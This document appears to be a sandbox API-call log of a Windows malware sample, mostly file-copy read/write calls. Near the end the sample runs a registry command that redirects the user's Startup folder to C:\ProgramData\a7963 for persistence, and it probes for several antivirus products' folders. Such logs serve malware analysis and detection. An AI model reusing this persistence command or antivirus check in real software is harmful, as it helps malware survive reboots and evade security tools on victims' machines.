[0116.396] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.396] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.396] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.396] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.396] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.397] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.397] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.398] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.398] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.398] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.398] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.398] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.398] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.398] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.399] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.399] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.399] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.399] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.399] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.399] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.399] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.400] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.400] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.400] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.400] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.400] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.400] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.400] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.401] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.401] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.401] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.401] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.401] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.401] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.401] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.402] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.402] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.402] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.402] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.402] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.403] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.403] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.403] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.403] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.403] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.403] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.404] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.404] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.404] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.404] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.404] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.404] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.404] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.405] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.405] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.405] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.406] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.406] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.406] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.407] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.407] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.407] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.407] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.407] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.407] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x1000, lpOverlapped=0x0) returned 1 [0116.407] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd3c, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd3c*=0x1000, lpOverlapped=0x0) returned 1 [0116.408] ReadFile (in: hFile=0x1b8, lpBuffer=0x21628d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f7d8, lpOverlapped=0x0 | out: lpBuffer=0x21628d0*, lpNumberOfBytesRead=0x19f7d8*=0x0, lpOverlapped=0x0) returned 1 [0116.408] HeapFree (in: hHeap=0x2160000, dwFlags=0x0, lpMem=0x21628d0 | out: hHeap=0x2160000) returned 1 [0116.408] CloseHandle (hObject=0x1b8) returned 1 [0116.408] WriteFile (in: hFile=0x1bc, lpBuffer=0x21638d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19dd68, lpOverlapped=0x0 | out: lpBuffer=0x21638d8*, lpNumberOfBytesWritten=0x19dd68*=0x1000, lpOverlapped=0x0) returned 1 [0116.408] HeapFree (in: hHeap=0x2160000, dwFlags=0x0, lpMem=0x21638d8 | out: hHeap=0x2160000) returned 1 [0116.408] CloseHandle (hObject=0x1bc) returned 1 [0116.414] CreateFileA (lpFileName="c:\\programdata\\a7963\\tlworker.exe\x0f\x87kk\x94\x05v\x96\x90p¤j0\x938q" (normalized: "c:\\programdata\\a7963\\tlworker.exe\x0f\x87kk\x94\x05v\x96\x90p¤j0\x938q"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0xffffffff [0116.415] WriteFile (in: hFile=0xffffffff, lpBuffer=0x411f24, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fb04, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x19fb04, lpOverlapped=0x0) returned 0 [0116.415] CloseHandle (hObject=0xffffffff) returned 1 [0116.415] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0116.415] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x21614a8 [0116.415] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\a7963", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fad8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fb1c | out: lpCommandLine="cmd.exe /c REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\a7963", lpProcessInformation=0x19fb1c*(hProcess=0x1b8, hThread=0x1bc, dwProcessId=0x308, dwThreadId=0xe34)) returned 1 [0117.031] GetSystemDirectoryA (in: lpBuffer=0x423910, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0117.031] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x30) returned 0x21614f0 [0117.031] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x19d704, nVolumeNameSize=0x200, lpVolumeSerialNumber=0x19d700, lpMaximumComponentLength=0x19d6fc, lpFileSystemFlags=0x19d6f8, lpFileSystemNameBuffer=0x19d904, nFileSystemNameSize=0x200 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x19d700*=0xb4197730, lpMaximumComponentLength=0x19d6fc*=0xff, lpFileSystemFlags=0x19d6f8*=0x3e702ff, lpFileSystemNameBuffer="NTFS") returned 1 [0117.032] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x20) returned 0x2161528 [0117.032] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x20) returned 0x2161550 [0117.032] LoadLibraryA (lpLibFileName="SHELL32.DLL") returned 0x76540000 [0117.032] GetProcAddress (hModule=0x76540000, lpProcName=0x2a8) returned 0x767b38b0 [0117.033] FreeLibrary (hLibModule=0x76540000) returned 1 [0117.033] GetVersionExA (in: lpVersionInformation=0x19da68*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19da68*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0117.033] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75b20000 [0117.033] GetProcAddress (hModule=0x75b20000, lpProcName="GetNativeSystemInfo") returned 0x75b35130 [0117.033] GetNativeSystemInfo (in: lpSystemInfo=0x19da44 | out: lpSystemInfo=0x19da44*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0117.033] GetVersionExA (in: lpVersionInformation=0x19da68*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19da68*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0117.033] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75b20000 [0117.033] GetProcAddress (hModule=0x75b20000, lpProcName="GetNativeSystemInfo") returned 0x75b35130 [0117.033] GetNativeSystemInfo (in: lpSystemInfo=0x19da44 | out: lpSystemInfo=0x19da44*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0117.033] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0117.033] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2161578 [0117.033] GetFileAttributesA (lpFileName="C:\\ProgramData\\AVAST Software" (normalized: "c:\\programdata\\avast software")) returned 0xffffffff [0117.033] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0117.033] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2165f78 [0117.033] GetFileAttributesA (lpFileName="C:\\ProgramData\\Avira" (normalized: "c:\\programdata\\avira")) returned 0xffffffff [0117.034] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0117.034] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x21659d8 [0117.034] GetFileAttributesA (lpFileName="C:\\ProgramData\\Kaspersky Lab" (normalized: "c:\\programdata\\kaspersky lab")) returned 0xffffffff [0117.034] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0117.034] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2165ea0 [0117.034] GetFileAttributesA (lpFileName="C:\\ProgramData\\ESET" (normalized: "c:\\programdata\\eset")) returned 0xffffffff [0117.034] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0117.034] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2165b88 [0117.034] GetFileAttributesA (lpFileName="C:\\ProgramData\\Panda Security" (normalized: "c:\\programdata\\panda security")) returned 0xffffffff [0117.034] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0117.034] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2165900 [0117.034] GetFileAttributesA (lpFileName="C:\\ProgramData\\Doctor Web" (normalized: "c:\\programdata\\doctor web")) returned 0xffffffff [0117.034] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0117.034] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x40) returned 0x2165990 [0117.034] GetFileAttributesA (lpFileName="C:\\ProgramData\\AVG" (normalized: "c:\\programdata\\avg")) returned 0xffffffff [0117.034] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x425110 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0117.034] 